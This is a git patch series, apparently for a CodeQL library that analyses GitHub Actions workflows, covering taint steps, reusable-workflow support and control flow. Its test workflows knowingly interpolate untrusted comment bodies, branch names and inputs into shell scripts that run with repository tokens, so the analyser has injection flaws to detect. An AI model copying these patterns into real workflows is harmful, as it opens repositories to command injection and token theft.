StepOutputAccessExpr { } -// -// private class JobOutputAccessTree extends LeafTree instanceof JobOutputAccessExpr { } \ No newline at end of file + +private class ExprAccessTree extends LeafTree instanceof ExprAccessExpr { } + diff --git a/ql/lib/codeql/actions/dataflow/FlowSources.qll b/ql/lib/codeql/actions/dataflow/FlowSources.qll index 5ce82a134ce6..b2ab51e28fa8 100644 --- a/ql/lib/codeql/actions/dataflow/FlowSources.qll +++ b/ql/lib/codeql/actions/dataflow/FlowSources.qll @@ -19,18 +19,6 @@ abstract class RemoteFlowSource extends SourceNode { override string getThreatModel() { result = "remote" } } -private class ChangedFilesSource extends RemoteFlowSource { - ChangedFilesSource() { - exists(UsesExpr uses | - uses.getTarget() = "tj-actions/changed-files" and - uses.getVersion() = ["v1", "v20", "v30", "v40"] and - uses = this.asExpr() - ) - } - - override string getSourceType() { result = "User-controlled list of changed files" } -} - bindingset[context] private predicate isExternalUserControlledIssue(string context) { context.regexpMatch("\\bgithub\\s*\\.\\s*event\\s*\\.\\s*issue\\s*\\.\\s*title\\b") or @@ -135,3 +123,15 @@ private class EventSource extends RemoteFlowSource { override string getSourceType() { result = "User-controlled events" } } + +private class ChangedFilesSource extends RemoteFlowSource { + ChangedFilesSource() { + exists(UsesExpr uses | + uses.getTarget() = "tj-actions/changed-files" and + uses.getVersion() = ["v10", "v20", "v30", "v40"] and + uses = this.asExpr() + ) + } + + override string getSourceType() { result = "User-controlled list of changed files" } +} diff --git a/ql/lib/codeql/actions/dataflow/internal/DataFlowPrivate.qll b/ql/lib/codeql/actions/dataflow/internal/DataFlowPrivate.qll index 8b57ea2436eb..9f0286238489 100644 --- a/ql/lib/codeql/actions/dataflow/internal/DataFlowPrivate.qll +++ b/ql/lib/codeql/actions/dataflow/internal/DataFlowPrivate.qll @@ -97,8 +97,8 @@ class DataFlowCallable instanceof Cfg::CfgScope { string getName() { if this instanceof StepStmt - then result = this.(StepStmt).getName() - else result = this.(JobStmt).getName() + then result = this.(StepStmt).getId() + else result = this.(JobStmt).getId() } } @@ -295,4 +295,3 @@ predicate additionalLambdaFlowStep(Node nodeFrom, Node nodeTo, boolean preserves * This compression is normally done to not show SSA steps, casts, etc. */ predicate neverSkipInPathGraph(Node node) { any() } - From da2ac2af03bb73814a7727796312464cbf35f4d5 Mon Sep 17 00:00:00 2001 From: =?UTF-8?q?Alvaro=20Mu=C3=B1oz?= Date: Thu, 8 Feb 2024 11:52:14 +0100 Subject: [PATCH 009/707] Process only .github/workflows yaml files --- ql/lib/codeql/actions/ast/internal/Actions.qll | 4 +--- 1 file changed, 1 insertion(+), 3 deletions(-) diff --git a/ql/lib/codeql/actions/ast/internal/Actions.qll b/ql/lib/codeql/actions/ast/internal/Actions.qll index e3be61fd3b99..a11759b0c932 100644 --- a/ql/lib/codeql/actions/ast/internal/Actions.qll +++ b/ql/lib/codeql/actions/ast/internal/Actions.qll @@ -19,9 +19,7 @@ module Actions { f = this.getLocation().getFile() and ( f.getRelativePath().regexpMatch("(^|.*/)\\.github/workflows/.*\\.ya?ml$") or - f.getBaseName() = ["action.yml", "action.yaml"] or - // ALVARO: Add any yaml files temporary for development - f.getExtension() = ["yml", "yaml"] + f.getBaseName() = ["action.yml", "action.yaml"] ) ) } From 1708e0f19d76f2feebc7cab3ecd81a0bc2b65878 Mon Sep 17 00:00:00 2001 From: =?UTF-8?q?Alvaro=20Mu=C3=B1oz?= Date: Thu, 8 Feb 2024 11:55:21 +0100 Subject: [PATCH 010/707] Move tests files to .github/workflows --- ql/lib/test/{ => .github/workflows}/test.yml | 0 .../{ => .github/workflows}/changed-files.yml | 0 ql/src/test/.github/workflows/ci-cleanup.yml | 47 ++++++++++++++ .../workflows/image_link_generator.yml | 55 +++++++++++++++++ .../workflows/image_link_generator_2.yml | 61 +++++++++++++++++++ .../workflows/image_link_generator_3.yml | 27 ++++++++ .../test/{ => .github/workflows}/inter1.yml | 0 .../test/{ => .github/workflows}/no-flow1.yml | 0 .../test/{ => .github/workflows}/no-flow2.yml | 0 .../test/{ => .github/workflows}/simple1.yml | 0 .../test/{ => .github/workflows}/simple2.yml | 0 ql/src/test/{ => .github/workflows}/test.yml | 0 12 files changed, 190 insertions(+) rename ql/lib/test/{ => .github/workflows}/test.yml (100%) rename ql/src/test/{ => .github/workflows}/changed-files.yml (100%) create mode 100644 ql/src/test/.github/workflows/ci-cleanup.yml create mode 100644 ql/src/test/.github/workflows/image_link_generator.yml create mode 100644 ql/src/test/.github/workflows/image_link_generator_2.yml create mode 100644 ql/src/test/.github/workflows/image_link_generator_3.yml rename ql/src/test/{ => .github/workflows}/inter1.yml (100%) rename ql/src/test/{ => .github/workflows}/no-flow1.yml (100%) rename ql/src/test/{ => .github/workflows}/no-flow2.yml (100%) rename ql/src/test/{ => .github/workflows}/simple1.yml (100%) rename ql/src/test/{ => .github/workflows}/simple2.yml (100%) rename ql/src/test/{ => .github/workflows}/test.yml (100%) diff --git a/ql/lib/test/test.yml b/ql/lib/test/.github/workflows/test.yml similarity index 100% rename from ql/lib/test/test.yml rename to ql/lib/test/.github/workflows/test.yml diff --git a/ql/src/test/changed-files.yml b/ql/src/test/.github/workflows/changed-files.yml similarity index 100% rename from ql/src/test/changed-files.yml rename to ql/src/test/.github/workflows/changed-files.yml diff --git a/ql/src/test/.github/workflows/ci-cleanup.yml b/ql/src/test/.github/workflows/ci-cleanup.yml new file mode 100644 index 000000000000..11a101cef491 --- /dev/null +++ b/ql/src/test/.github/workflows/ci-cleanup.yml @@ -0,0 +1,47 @@ +run-name: Cleanup ${{ github.head_ref }} +on: + pull_request_target: + types: labeled + paths: + - "images/**" + +jobs: + clean_ci: + name: Clean CI runs + runs-on: ubuntu-latest + permissions: + actions: write + steps: + - env: + GITHUB_TOKEN: ${{ secrets.GITHUB_TOKEN }} + shell: pwsh + run: | + $startDate = Get-Date -UFormat %s + $workflows = @("macos11", "macos12", "ubuntu2004", "ubuntu2204", "windows2019", "windows2022") + while ($true) { + $continue = $false + foreach ($wf in $workflows) { + $skippedCommand = "gh run list --workflow ${wf}.yml --branch ${{ github.event.pull_request.head.ref }} --repo ${{ github.repository }} --status skipped --json databaseId" + $skippedIds = Invoke-Expression -Command $skippedCommand | ConvertFrom-Json | ForEach-Object { $_.databaseId } + $skippedIds | ForEach-Object { + $deleteCommand = "gh run delete --repo ${{ github.repository }} $_" + Invoke-Expression -Command $deleteCommand + } + $pendingCommand = "gh run list --workflow ${wf}.yml --branch ${{ github.event.pull_request.head.ref }} --repo ${{ github.repository }} --status requested --json databaseId --template '{{ . | len }}'" + $pending = Invoke-Expression -Command $pendingCommand + if ($pending -gt 0) { + Write-Host "Pending for ${wf}.yml: $pending run(s)" + $continue = $true + } + } + if ($continue -eq $false) { + Write-Host "All done, exiting" + break + } + $curDate = Get-Date -UFormat %s + if (($curDate - $startDate) -gt 60) { + Write-Host "Reached timeout, exiting" + break + } + Write-Host "Waiting 5 seconds..." + Start-Sleep -Seconds 5 diff --git a/ql/src/test/.github/workflows/image_link_generator.yml b/ql/src/test/.github/workflows/image_link_generator.yml new file mode 100644 index 000000000000..6239f0490d13 --- /dev/null +++ b/ql/src/test/.github/workflows/image_link_generator.yml @@ -0,0 +1,55 @@ +name: Image URL Processing + +on: + issue_comment: + types: [created] + +jobs: + process-image-url: + runs-on: ubuntu-latest + if: contains(github.event.comment.body, 'https://github.com/github/release-assets/assets/') + steps: + - name: Checkout + uses: actions/checkout@v2 + + - name: Extract and Clean Initial URL + id: extract-url + run: | + INITIAL_URL=$(echo "${{ github.event.comment.body }}" | grep -o 'https://github.com/github/release-assets/assets/[^ >]*') + echo "Cleaned Initial URL: $INITIAL_URL" + echo "::set-output name=initial_url::$INITIAL_URL" + + - name: Get Redirected URL with Debugging + id: curl + run: | + REDIRECTED_URL=$(curl -L -o /dev/null -w %{url_effective} -sS "${{ steps.extract-url.outputs.initial_url }}") + echo "Curl Command Executed" + echo "Redirected URL: $REDIRECTED_URL" + echo "::set-output name=redirected_url::$REDIRECTED_URL" + + - name: Trim URL after PNG + id: trim-url + run: | + TRIMMED_URL=$(echo "${{ steps.curl.outputs.redirected_url }}" | sed 's/\(.*\.png\).*/\1/') + echo "Trimmed URL: $TRIMMED_URL" + echo "::set-output name=trimmed_url::$TRIMMED_URL" + + - name: Output Final Trimmed URL + run: | + echo "Final Trimmed Image URL: ${{ steps.trim-url.outputs.trimmed_url }}" + + - name: Update Comment with New URL + run: | + COMMENT_URL="${{ github.event.comment.url }}" + NEW_COMMENT_BODY="Use this link to include this asset in your changelog: ${{ steps.trim-url.outputs.trimmed_url }}" + ORIGINAL_COMMENT_BODY="${{ github.event.comment.body }}" + UPDATED_COMMENT="${ORIGINAL_COMMENT_BODY} 👀 ${NEW_COMMENT_BODY}" + + PAYLOAD=$(jq -n --arg body "$UPDATED_COMMENT" '{"body": $body}') + curl -X PATCH \ + -H "Authorization: token ${{ secrets.GITHUB_TOKEN }}" \ + -H "Accept: application/vnd.github.v3+json" \ + "${COMMENT_URL}" \ + -d "$PAYLOAD" + env: + GITHUB_TOKEN: ${{ secrets.GITHUB_TOKEN }} diff --git a/ql/src/test/.github/workflows/image_link_generator_2.yml b/ql/src/test/.github/workflows/image_link_generator_2.yml new file mode 100644 index 000000000000..01d332492519 --- /dev/null +++ b/ql/src/test/.github/workflows/image_link_generator_2.yml @@ -0,0 +1,61 @@ +name: Image URL Processing + +on: + issue_comment: + types: [created] + +jobs: + process-image-url: + runs-on: ubuntu-latest + if: contains(github.event.comment.body, 'https://github.com/github/release-assets/assets/') + steps: + - name: Checkout + uses: actions/checkout@v2 + + - name: Extract and Clean Initial URL + id: extract-url + env: + BODY: ${{ github.event.comment.body }} + run: | + INITIAL_URL=$(echo "$BODY" | grep -o 'https://github.com/github/release-assets/assets/[^ >]*') + echo "Cleaned Initial URL: $INITIAL_URL" + echo "::set-output name=initial_url::$INITIAL_URL" + + - name: Get Redirected URL with Debugging + id: curl + env: + INITIAL_URL: ${{ steps.extract-url.outputs.initial_url }} + run: | + REDIRECTED_URL=$(curl -L -o /dev/null -w %{url_effective} -sS "$INITIAL_URL") + echo "Curl Command Executed" + echo "Redirected URL: $REDIRECTED_URL" + echo "::set-output name=redirected_url::$REDIRECTED_URL" + + - name: Trim URL after PNG + id: trim-url + env: + REDIRECTED_URL: ${{ steps.curl.outputs.redirected_url }} + run: | + TRIMMED_URL=$(echo "$REDIRECTED_URL" | sed 's/\(.*\.png\).*/\1/') + echo "Trimmed URL: $TRIMMED_URL" + echo "::set-output name=trimmed_url::$TRIMMED_URL" + + - name: Output Final Trimmed URL + run: | + echo "Final Trimmed Image URL: ${{ steps.trim-url.outputs.trimmed_url }}" + + - name: Update Comment with New URL + env: + GITHUB_TOKEN: ${{ secrets.GITHUB_TOKEN }} + COMMENT_URL: ${{ github.event.comment.url }} + ORIGINAL_COMMENT_BODY: ${{ github.event.comment.body }} + run: | + NEW_COMMENT_BODY="Use this link to include this asset in your changelog: ${{ steps.trim-url.outputs.trimmed_url }}" + UPDATED_COMMENT="${ORIGINAL_COMMENT_BODY} 👀 ${NEW_COMMENT_BODY}" + + PAYLOAD=$(jq -n --arg body "$UPDATED_COMMENT" '{"body": $body}') + curl -X PATCH \ + -H "Authorization: token ${{ secrets.GITHUB_TOKEN }}" \ + -H "Accept: application/vnd.github.v3+json" \ + "${COMMENT_URL}" \ + -d "$PAYLOAD" diff --git a/ql/src/test/.github/workflows/image_link_generator_3.yml b/ql/src/test/.github/workflows/image_link_generator_3.yml new file mode 100644 index 000000000000..70aece4f7cff --- /dev/null +++ b/ql/src/test/.github/workflows/image_link_generator_3.yml @@ -0,0 +1,27 @@ +name: Image URL Processing + +on: + issue_comment: + types: [created] + +jobs: + process-image-url: + runs-on: ubuntu-latest + if: contains(github.event.comment.body, 'https://github.com/github/release-assets/assets/') + steps: + - name: Checkout + uses: actions/checkout@v2 + + - name: Extract and Clean Initial URL + id: source + env: + BODY: ${{ github.event.comment.body }} + run: | + INITIAL_URL=$(echo "$BODY" | grep -o 'https://github.com/github/release-assets/assets/[^ >]*') + echo "Cleaned Initial URL: $INITIAL_URL" + echo "::set-output name=initial_url::$INITIAL_URL" + + - name: Get Redirected URL with Debugging + id: sink + run: | + echo ${{ steps.source.outputs.initial_url }} diff --git a/ql/src/test/inter1.yml b/ql/src/test/.github/workflows/inter1.yml similarity index 100% rename from ql/src/test/inter1.yml rename to ql/src/test/.github/workflows/inter1.yml diff --git a/ql/src/test/no-flow1.yml b/ql/src/test/.github/workflows/no-flow1.yml similarity index 100% rename from ql/src/test/no-flow1.yml rename to ql/src/test/.github/workflows/no-flow1.yml diff --git a/ql/src/test/no-flow2.yml b/ql/src/test/.github/workflows/no-flow2.yml similarity index 100% rename from ql/src/test/no-flow2.yml rename to ql/src/test/.github/workflows/no-flow2.yml diff --git a/ql/src/test/simple1.yml b/ql/src/test/.github/workflows/simple1.yml similarity index 100% rename from ql/src/test/simple1.yml rename to ql/src/test/.github/workflows/simple1.yml diff --git a/ql/src/test/simple2.yml b/ql/src/test/.github/workflows/simple2.yml similarity index 100% rename from ql/src/test/simple2.yml rename to ql/src/test/.github/workflows/simple2.yml diff --git a/ql/src/test/test.yml b/ql/src/test/.github/workflows/test.yml similarity index 100% rename from ql/src/test/test.yml rename to ql/src/test/.github/workflows/test.yml From 83ca36bc76ff38f99be4c14a2f07a69b0ab021b5 Mon Sep 17 00:00:00 2001 From: =?UTF-8?q?Alvaro=20Mu=C3=B1oz?= Date: Thu, 8 Feb 2024 11:56:22 +0100 Subject: [PATCH 011/707] Support RunExpr's env vars --- ql/lib/codeql/actions/Ast.qll | 8 +++++ .../actions/controlflow/internal/Cfg.qll | 14 ++++++-- ql/lib/codeql/actions/dataflow/FlowSteps.qll | 32 +++++++++++++++++++ .../dataflow/internal/DataFlowPrivate.qll | 15 +++++++-- 4 files changed, 65 insertions(+), 4 deletions(-) diff --git a/ql/lib/codeql/actions/Ast.qll b/ql/lib/codeql/actions/Ast.qll index d2c7fdd45010..d9306b53815d 100644 --- a/ql/lib/codeql/actions/Ast.qll +++ b/ql/lib/codeql/actions/Ast.qll @@ -169,6 +169,13 @@ class RunExpr extends StepStmt, Expression { Expression getScriptExpr() { result = scriptExpr } + Expression getEnvExpr(string name) { + exists(Actions::StepEnv env | + env.getStep() = this and + env.(YamlMapping).maps(any(YamlScalar s | s.getValue() = name), result) + ) + } + string getScript() { result = scriptExpr.getValue() } } @@ -183,6 +190,7 @@ class ExprAccessExpr extends Expression instanceof YamlString { string getExpression() { result = expr } JobStmt getJob() { result.getAChildNode*() = this } + //override string toString() { result = expr } } /** diff --git a/ql/lib/codeql/actions/controlflow/internal/Cfg.qll b/ql/lib/codeql/actions/controlflow/internal/Cfg.qll index c549eb401980..a2ebb10219ef 100644 --- a/ql/lib/codeql/actions/controlflow/internal/Cfg.qll +++ b/ql/lib/codeql/actions/controlflow/internal/Cfg.qll @@ -171,8 +171,18 @@ private class UsesTree extends StandardPreOrderTree instanceof UsesExpr { } private class RunTree extends StandardPreOrderTree instanceof RunExpr { - override ControlFlowTree getChildNode(int i) { result = super.getScriptExpr() and i = 0 } + //override ControlFlowTree getChildNode(int i) { result = super.getScriptExpr() and i = 0 } + override ControlFlowTree getChildNode(int i) { + result = + rank[i](Expression child, Location l | + (child = super.getEnvExpr(_) or child = super.getScriptExpr()) and + l = child.getLocation() + | + child + order by + l.getStartLine(), l.getStartColumn(), l.getEndColumn(), l.getEndLine(), child.toString() + ) + } } private class ExprAccessTree extends LeafTree instanceof ExprAccessExpr { } - diff --git a/ql/lib/codeql/actions/dataflow/FlowSteps.qll b/ql/lib/codeql/actions/dataflow/FlowSteps.qll index 528f9e54832c..223ff305ba43 100644 --- a/ql/lib/codeql/actions/dataflow/FlowSteps.qll +++ b/ql/lib/codeql/actions/dataflow/FlowSteps.qll @@ -20,6 +20,9 @@ class AdditionalTaintStep extends Unit { abstract predicate step(DataFlow::Node node1, DataFlow::Node node2); } +/** + * Holds if actions-find-and-replace-string step is used. + */ private class ActionsFindAndReplaceStringStep extends AdditionalTaintStep { override predicate step(DataFlow::Node pred, DataFlow::Node succ) { exists(UsesExpr u | @@ -29,3 +32,32 @@ private class ActionsFindAndReplaceStringStep extends AdditionalTaintStep { ) } } + +/** + * Holds if a Run step declares an environment variable, uses it in its script and sets an output in its script. + * e.g. + * - name: Extract and Clean Initial URL + * id: extract-url + * env: + * BODY: ${{ github.event.comment.body }} + * run: | + * INITIAL_URL=$(echo "$BODY" | grep -o 'https://github.com/github/release-assets/assets/[^ >]*') + * echo "Cleaned Initial URL: $INITIAL_URL" + * echo "::set-output name=initial_url::$INITIAL_URL" + */ +private class RunEnvToScriptStep extends AdditionalTaintStep { + override predicate step(DataFlow::Node pred, DataFlow::Node succ) { test(pred, succ) } +} + +predicate test(DataFlow::Node pred, DataFlow::Node succ) { + exists(RunExpr r, string varName | + r.getEnvExpr(varName) = pred.asExpr() and + exists(string script, string line | + script = r.getScript() and + line = script.splitAt("\n") and + line.regexpMatch(".*::set-output\\s+name.*") and + script.indexOf("$" + ["", "{", "ENV{"] + varName) > 0 + ) and + succ.asExpr() = r + ) +} diff --git a/ql/lib/codeql/actions/dataflow/internal/DataFlowPrivate.qll b/ql/lib/codeql/actions/dataflow/internal/DataFlowPrivate.qll index 9f0286238489..534eb4fe657b 100644 --- a/ql/lib/codeql/actions/dataflow/internal/DataFlowPrivate.qll +++ b/ql/lib/codeql/actions/dataflow/internal/DataFlowPrivate.qll @@ -197,7 +197,7 @@ predicate parameterMatch(ParameterPosition ppos, ArgumentPosition apos) { ppos = */ predicate simpleLocalFlowStep(Node nodeFrom, Node nodeTo) { localFlowStep(nodeFrom, nodeTo) } -predicate stepOutputDefToUse(Node nodeFrom, Node nodeTo) { +predicate usesOutputDefToUse(Node nodeFrom, Node nodeTo) { // nodeTo is an OutputVarAccessExpr scoped with the namespace of the nodeFrom Step output exists(UsesExpr uses, StepOutputAccessExpr outputRead | uses = nodeFrom.asExpr() and @@ -207,6 +207,16 @@ predicate stepOutputDefToUse(Node nodeFrom, Node nodeTo) { ) } +predicate runOutputDefToUse(Node nodeFrom, Node nodeTo) { + // nodeTo is an OutputVarAccessExpr scoped with the namespace of the nodeFrom Step output + exists(RunExpr uses, StepOutputAccessExpr outputRead | + uses = nodeFrom.asExpr() and + outputRead = nodeTo.asExpr() and + outputRead.getStepId() = uses.getId() and + uses.getJob() = outputRead.getJob() + ) +} + predicate jobOutputDefToUse(Node nodeFrom, Node nodeTo) { // nodeTo is a JobOutputAccessExpr and nodeFrom is the Job output expression exists(Expression astFrom, JobOutputAccessExpr astTo | @@ -223,7 +233,8 @@ predicate jobOutputDefToUse(Node nodeFrom, Node nodeTo) { */ pragma[nomagic] predicate localFlowStep(Node nodeFrom, Node nodeTo) { - stepOutputDefToUse(nodeFrom, nodeTo) or + usesOutputDefToUse(nodeFrom, nodeTo) or + runOutputDefToUse(nodeFrom, nodeTo) or jobOutputDefToUse(nodeFrom, nodeTo) } From 5006ffe20338f5355fdb578527b06acfa04f3285 Mon Sep 17 00:00:00 2001 From: =?UTF-8?q?Alvaro=20Mu=C3=B1oz?= Date: Thu, 8 Feb 2024 12:01:41 +0100 Subject: [PATCH 012/707] Use the LibYaml default AST hierarchy --- ql/lib/codeql/actions/Ast.qll | 37 +---------------------------------- 1 file changed, 1 insertion(+), 36 deletions(-) diff --git a/ql/lib/codeql/actions/Ast.qll b/ql/lib/codeql/actions/Ast.qll index d9306b53815d..96a8a2a7f147 100644 --- a/ql/lib/codeql/actions/Ast.qll +++ b/ql/lib/codeql/actions/Ast.qll @@ -2,48 +2,13 @@ private import codeql.actions.ast.internal.Actions private import codeql.Locations /** - * Base class for the AST tree. - * Based on YamlNode from the Yaml library but making mapping values children of the mapping keys: - * eg: top: - * key: value - * According to the Yaml library, both `key` and `value` are direct children of `top` - * This Tree implementation makes `key` child od `top` and `value` child of `key` + * Base class for the AST tree. Based on YamlNode from the Yaml library. */ class AstNode instanceof YamlNode { AstNode getParentNode() { result = super.getParentNode() } - // AstNode getParentNode() { - // if exists(YamlMapping m | m.maps(_, this)) - // then exists(YamlMapping m | m.maps(result, this)) - // else result = super.getParentNode() - // } AstNode getAChildNode() { result = super.getAChildNode() } - // AstNode getAChildNode() { - // if this instanceof YamlMapping - // then this.(YamlMapping).maps(result, _) - // else - // if this instanceof YamlCollection - // then result = super.getChildNode(_) - // else - // if this instanceof YamlScalar and exists(YamlMapping m | m.maps(this, _)) - // then exists(YamlMapping m | m.maps(this, result)) - // else none() - // } - // /** - // * This should be getAChildNode(int i) - // */ - // AstNode getChildNodeByOrder(int i) { - // result = - // rank[i](Expression child, Location l | - // child = this.getAChildNode() and - // child.getLocation() = l - // | - // child - // order by - // l.getStartLine(), l.getStartColumn(), l.getEndColumn(), l.getEndLine(), child.toString() - // ) - // } string toString() { result = super.toString() } string getAPrimaryQlClass() { result = super.getAPrimaryQlClass() } From db413361f78c836c190b112dafbbc1a1991dff52 Mon Sep 17 00:00:00 2001 From: =?UTF-8?q?Alvaro=20Mu=C3=B1oz?= Date: Thu, 8 Feb 2024 15:11:39 +0100 Subject: [PATCH 013/707] Add Reusable Workflow test --- .../.github/workflows/calling_workflow.yml | 18 ++++++++++++++++++ .../.github/workflows/reusable_workflow.yml | 18 ++++++++++++++++++ 2 files changed, 36 insertions(+) create mode 100644 ql/lib/test/.github/workflows/calling_workflow.yml create mode 100644 ql/lib/test/.github/workflows/reusable_workflow.yml diff --git a/ql/lib/test/.github/workflows/calling_workflow.yml b/ql/lib/test/.github/workflows/calling_workflow.yml new file mode 100644 index 000000000000..3b0ab8f18d32 --- /dev/null +++ b/ql/lib/test/.github/workflows/calling_workflow.yml @@ -0,0 +1,18 @@ +on: push + +jobs: + call-workflow-1-in-local-repo: + uses: octo-org/this-repo/.github/workflows/reusable_workflow.yml@172239021f7ba04fe7327647b213799853a9eb89 + with: + config-path: ${{ github.event.pull_request.head.ref }} + secrets: inherit + call-workflow-2-in-local-repo: + uses: ./.github/workflows/reusable_workflow.yml + with: + config-path: ${{ github.event.pull_request.head.ref }} + secrets: inherit + call-workflow-in-another-repo: + uses: octo-org/another-repo/.github/workflows/workflow.yml@v1 + with: + config-path: ${{ github.event.pull_request.head.ref }} + secrets: inherit diff --git a/ql/lib/test/.github/workflows/reusable_workflow.yml b/ql/lib/test/.github/workflows/reusable_workflow.yml new file mode 100644 index 000000000000..f31c8a63d740 --- /dev/null +++ b/ql/lib/test/.github/workflows/reusable_workflow.yml @@ -0,0 +1,18 @@ +name: Reusable workflow example + +on: + workflow_call: + inputs: + config-path: + required: true + type: string + secrets: + token: + required: true + +jobs: + triage: + runs-on: ubuntu-latest + steps: + - id: sink + run: echo ${{ inputs.config-path }} From 9659098ab6745ff95c14ae0683423b1c18971408 Mon Sep 17 00:00:00 2001 From: =?UTF-8?q?Alvaro=20Mu=C3=B1oz?= Date: Thu, 8 Feb 2024 15:40:06 +0100 Subject: [PATCH 014/707] Support for Reusable workflows --- ql/lib/codeql/actions/Ast.qll | 114 +++++++++++++++++- .../actions/controlflow/internal/Cfg.qll | 48 +++++++- .../dataflow/internal/DataFlowPrivate.qll | 76 +++++++----- ql/lib/test/.github/workflows/test.yml | 10 +- ql/lib/test/test.ql | 19 ++- 5 files changed, 217 insertions(+), 50 deletions(-) diff --git a/ql/lib/codeql/actions/Ast.qll b/ql/lib/codeql/actions/Ast.qll index 96a8a2a7f147..8f8347e766f4 100644 --- a/ql/lib/codeql/actions/Ast.qll +++ b/ql/lib/codeql/actions/Ast.qll @@ -34,8 +34,51 @@ class WorkflowStmt extends Statement instanceof Actions::Workflow { JobStmt getAJob() { result = super.getJob(_) } JobStmt getJob(string id) { result = super.getJob(id) } + + predicate isReusable() { this instanceof ReusableWorkflowStmt } } +class ReusableWorkflowStmt extends WorkflowStmt { + YamlMapping parameters; + + ReusableWorkflowStmt() { + exists(Actions::On on | + on.getWorkflow() = this and + on.getNode("workflow_call").(YamlMapping).lookup("inputs") = parameters + ) + } + + ParamsStmt getParams() { result = parameters } + + // TODO: implemnt callable name + string getName() { result = this.getLocation().getFile().getRelativePath() } +} + +class ParamsStmt extends Statement instanceof YamlMapping { + ParamsStmt() { + exists(Actions::On on | on.getNode("workflow_call").(YamlMapping).lookup("inputs") = this) + } + + /** + * Gets a specific parameter expression (YamlMapping) by name. + * eg: + * on: + * workflow_call: + * inputs: + * config-path: + * required: true + * type: string + * secrets: + * token: + * required: true + */ + ParamExpr getParamExpr(string name) { + this.(YamlMapping).maps(any(YamlScalar s | s.getValue() = name), result) + } +} + +class ParamExpr extends Expression instanceof YamlValue { } + /** * A Job is a collection of steps that run in an execution environment. */ @@ -71,6 +114,11 @@ class JobStmt extends Statement instanceof Actions::Job { * out2: ${steps.foo.baz} */ JobOutputStmt getOutputStmt() { result = this.(Actions::Job).lookup("outputs") } + + /** + * Reusable workflow jobs may have Uses children + */ + JobUsesExpr getUsesExpr() { result = this.(Actions::Job).lookup("uses") } } /** @@ -104,19 +152,27 @@ class StepStmt extends Statement instanceof Actions::Step { JobStmt getJob() { result = super.getJob() } } +abstract class UsesExpr extends Expression { + abstract string getTarget(); + + abstract string getVersion(); + + abstract Expression getArgument(string key); +} + /** * A Uses step represents a call to an action that is defined in a GitHub repository. */ -class UsesExpr extends StepStmt, Expression { +class StepUsesExpr extends StepStmt, UsesExpr { Actions::Uses uses; - UsesExpr() { uses.getStep() = this } + StepUsesExpr() { uses.getStep() = this } - string getTarget() { result = uses.getGitHubRepository() } + override string getTarget() { result = uses.getGitHubRepository() } - string getVersion() { result = uses.getVersion() } + override string getVersion() { result = uses.getVersion() } - Expression getArgument(string key) { + override Expression getArgument(string key) { exists(Actions::With with | with.getStep() = this and result = with.lookup(key) @@ -124,6 +180,54 @@ class UsesExpr extends StepStmt, Expression { } } +/** + * A Uses step represents a call to an action that is defined in a GitHub repository. + */ +class JobUsesExpr extends UsesExpr instanceof YamlScalar { + JobStmt job; + + JobUsesExpr() { job.(YamlMapping).lookup("uses") = this } + + JobStmt getJob() { result = job } + + /** + * Gets a regular expression that parses an `owner/repo@version` reference within a `uses` field in an Actions job step. + * local repo: octo-org/this-repo/.github/workflows/workflow-1.yml@172239021f7ba04fe7327647b213799853a9eb89 + * local repo: ./.github/workflows/workflow-2.yml + * remote repo: octo-org/another-repo/.github/workflows/workflow.yml@v1 + */ + private string repoUsesParser() { result = "([^/]+)/([^/]+)/([^@]+)@(.+)" } + + private string pathUsesParser() { result = "\\./(.+)" } + + override string getTarget() { + exists(string name | + this.(YamlScalar).getValue() = name and + if name.matches("./%") + then result = name.regexpCapture(this.pathUsesParser(), 1) + else + result = + name.regexpCapture(this.repoUsesParser(), 1) + "/" + + name.regexpCapture(this.repoUsesParser(), 2) + "/" + + name.regexpCapture(this.repoUsesParser(), 3) + ) + } + + /** Gets the version reference used when checking out the Action, e.g. `v2` in `actions/checkout@v2`. */ + override string getVersion() { + exists(string name | + this.(YamlScalar).getValue() = name and + if not name.matches("\\.%") + then result = this.(YamlScalar).getValue().regexpCapture(this.repoUsesParser(), 4) + else none() + ) + } + + override Expression getArgument(string key) { + job.(YamlMapping).lookup("with").(YamlMapping).lookup(key) = result + } +} + /** * A Run step represents the evaluation of a provided script */ diff --git a/ql/lib/codeql/actions/controlflow/internal/Cfg.qll b/ql/lib/codeql/actions/controlflow/internal/Cfg.qll index a2ebb10219ef..ac8ab616e3ec 100644 --- a/ql/lib/codeql/actions/controlflow/internal/Cfg.qll +++ b/ql/lib/codeql/actions/controlflow/internal/Cfg.qll @@ -87,6 +87,8 @@ module Completion { module CfgScope { abstract class CfgScope extends AstNode { } + private class ReusableWorkflowScope extends CfgScope instanceof ReusableWorkflowStmt { } + private class JobScope extends CfgScope instanceof JobStmt { } } @@ -120,9 +122,15 @@ private module Implementation implements CfgShared::InputSig { int maxSplits() { result = 0 } - predicate scopeFirst(CfgScope scope, AstNode e) { first(scope.(JobStmt), e) } + predicate scopeFirst(CfgScope scope, AstNode e) { + first(scope.(ReusableWorkflowStmt).getParams(), e) or + first(scope.(JobStmt), e) + } - predicate scopeLast(CfgScope scope, AstNode e, Completion c) { last(scope.(JobStmt), e, c) } + predicate scopeLast(CfgScope scope, AstNode e, Completion c) { + last(scope.(ReusableWorkflowStmt), e, c) or + last(scope.(JobStmt), e, c) + } predicate successorTypeIsSimple(SuccessorType t) { t instanceof NormalSuccessor } @@ -139,11 +147,30 @@ private import CfgImpl private import Completion private import CfgScope +private class ReusableWorkflowTree extends StandardPreOrderTree instanceof ReusableWorkflowStmt { + override ControlFlowTree getChildNode(int i) { result = super.getParams() and i = 0 } +} + +private class ReusableWorkflowParamsTree extends StandardPreOrderTree instanceof ParamsStmt { + override ControlFlowTree getChildNode(int i) { + result = + rank[i](Expression child, Location l | + child = super.getParamExpr(_) and l = child.getLocation() + | + child + order by + l.getStartLine(), l.getStartColumn(), l.getEndColumn(), l.getEndLine(), child.toString() + ) + } +} + +private class ParamExprTree extends LeafTree instanceof ParamExpr { } + private class JobTree extends StandardPreOrderTree instanceof JobStmt { override ControlFlowTree getChildNode(int i) { result = rank[i](Expression child, Location l | - (child = super.getAStep() or child = super.getOutputStmt()) and + (child = super.getAStep() or child = super.getOutputStmt() or child = super.getUsesExpr()) and l = child.getLocation() | child @@ -157,7 +184,20 @@ private class JobOutputTree extends StandardPreOrderTree instanceof JobOutputStm override ControlFlowTree getChildNode(int i) { result = super.asYamlMapping().getValueNode(i) } } -private class UsesTree extends StandardPreOrderTree instanceof UsesExpr { +private class StepUsesTree extends StandardPreOrderTree instanceof StepUsesExpr { + override ControlFlowTree getChildNode(int i) { + result = + rank[i](Expression child, Location l | + child = 